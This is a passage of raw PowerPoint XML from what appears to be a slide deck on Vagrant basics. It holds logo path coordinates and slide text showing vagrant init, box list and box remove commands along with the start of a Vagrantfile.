                    <a:pt x="163233" y="14163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178753" y="14163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174637" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="208259" y="101475"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="190957" y="101475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201777" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218897" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208259" y="101475"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="109359" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93027" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54686" y="118193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70966" y="118193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109359" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="178753" y="14163"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="163233" y="14163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186626" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203280" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178753" y="14163"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="282600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261644" y="2333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247451" y="9421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239357" y="21499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236791" y="38759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236791" y="96366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238909" y="112600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246076" y="124715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259513" y="132292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280441" y="134912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290849" y="134547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301482" y="133463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311966" y="131676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="129202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="119573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281038" y="119573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267302" y="118143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258949" y="113745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254802" y="106218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253782" y="96366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253776" y="38759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255034" y="28291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259634" y="20811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268293" y="16650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281825" y="15363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317478" y="15363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318985" y="4146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309647" y="2321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300426" y="1037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291305" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282600" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="321932" y="72767"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="305600" y="72767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305600" y="117231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296557" y="118972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287921" y="119573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="119573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="72767"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="317478" y="15363"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281825" y="15363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290108" y="15580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298751" y="16221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307732" y="17267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317030" y="18702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317478" y="15363"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="403352" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="353377" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353377" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370306" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370306" y="85571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421823" y="85571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420458" y="83591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430096" y="79183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436551" y="72546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437357" y="70599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370306" y="70599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370306" y="17114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437029" y="17114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432869" y="10579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421143" y="4200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403352" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="421823" y="85571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="402361" y="85571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435013" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454469" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421823" y="85571"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="437029" y="17114"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="402755" y="17114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412935" y="17993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419619" y="20900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423280" y="26241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424367" y="34215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424395" y="53309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423280" y="61402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419619" y="66746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412935" y="69694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402755" y="70599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437357" y="70599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440170" y="63808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441277" y="53309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441299" y="34215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439324" y="20719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437029" y="17114"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="535101" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="512292" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468058" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485165" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495782" y="101475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568704" y="101475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563728" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500291" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523709" y="14163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539215" y="14163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535101" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="568704" y="101475"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="551434" y="101475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562229" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579335" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568704" y="101475"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="539215" y="14163"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="523709" y="14163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547103" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563728" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539215" y="14163"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="624776" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="601586" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601586" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617702" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617702" y="21440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634676" y="21440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624776" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="634676" y="21440"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="617702" y="21440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674738" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697915" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697915" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681812" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634676" y="21440"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="697915" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="681812" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681812" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697915" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697915" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="774623" y="17114"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="757720" y="17114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757720" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774623" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774623" y="17114"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="813765" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="718578" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718578" y="17114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="813765" y="17114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="813765" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="328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71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589" y="190436"/>
            <a:ext cx="4017645" cy="19932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sz="1200" spc="-204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1200" spc="-170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BASICS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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Init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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>&lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>]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45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Configures </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-265" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>use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5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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ubuntu/trusty64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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init precise64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https://iles.vagrantup.com/precise64.box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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>box</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>list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589" y="2163838"/>
            <a:ext cx="122110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5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>hashicorp/precise64  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>ubuntu/trusty64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5947" y="2163841"/>
            <a:ext cx="161226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666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>virtualbox,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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>1.1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>virtualbox,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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>20160406.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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589" y="2508011"/>
            <a:ext cx="306705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13205" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>ubuntu_1604_x64	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>virtualbox, 0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>broken!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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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ubuntu_1604_x64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589" y="190436"/>
            <a:ext cx="4276725" cy="2769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sz="1200" spc="-204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1200" spc="-170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BASICS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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Init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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>&lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>]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50" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Creates </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Vagrantfile within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-320" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2211070">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrantile  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrant.conigure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”2”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
